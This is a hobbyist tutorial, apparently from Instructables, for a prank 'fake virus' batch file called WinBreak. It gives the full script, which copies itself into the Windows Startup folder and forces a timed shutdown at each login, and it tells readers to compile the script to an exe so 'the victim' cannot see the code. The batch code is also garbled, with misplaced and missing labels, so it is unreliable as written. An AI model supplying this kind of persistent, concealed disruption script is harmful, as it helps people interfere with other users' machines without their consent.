You broke windows. Now Windows breaks you.
Step 1: the Scripting
Okay, so WinBreak.cmd is a file that will shutdown your computer in 10 seconds. If this file is kept open, it will cancel the shutdown on 7 seconds, concluding that no shutdown happens. Now for the scripting:
Here is the code to copy:
@echo off
setlocal enabledelayedexpansion
set cast=You broke windows, Now windows brakes you.
:: =================================================================
:: (c)2014 Josh O.N.
:: Do Not Distribute; All Rights Reserved
:: You broke windows now windows brakes you - WinBreak.exe FAKE VIRUS
:: =================================================================
set owner=
if "%USERDOMAIN%" == "owner-PC" set owner=.owner-PC
copy %0 "C:\Users\%username%%owner%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" :loop
set repeat=1
set max=44
set cast=You broke windows, Now windows breaks you.
call :write
shutdown -s -c "You Broke Windows. Now Windows Brakes You!" -t 10 -f
timeout /t 7 /NOBREAK >nul
shutdown /a
set repeat=1
set max=45
set cast=Windows changed it's mind. Your off the hook.
call :write
if "%repeat%" == "%max%" endlocal & exit /b
set /a repeat=%repeat%+1
set write=!cast:~0,%repeat%!
echo !write!
ping localhost -n 1 >nul call :write
Now for the explanation:
set owner=
if "%USERDOMAIN%" == "owner-PC" set owner=.owner-PC
copy %0 "C:\Users\%username%%owner%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
This code copies the batch file to startup, making it so that as soon as you log in to the account you are currently on, this batch file runs.
shutdown -s -c "You Broke Windows. Now Windows Brakes You!" -t 10 -f
timeout /t 7 /NOBREAK >nul
shutdown /a
This code shuts down the computer in 10 seconds. If the user has this batch file open for more then 7 seconds, the shutdown stops.
Step 2: Encripting Your Batch File.
So now that you have your batch file all neat and tidy, you want to compile it to exe so that the victim can't see the code.
Either 1)
Download a compiler and compile it
Or 2)
Download the compiled batch file from this link:
Which brings us to step 3...
Step 3: Extras
Downloading Links:
Compiled EXE:
Raw batch file:
Please give me an idea of what other batch file instructable I should make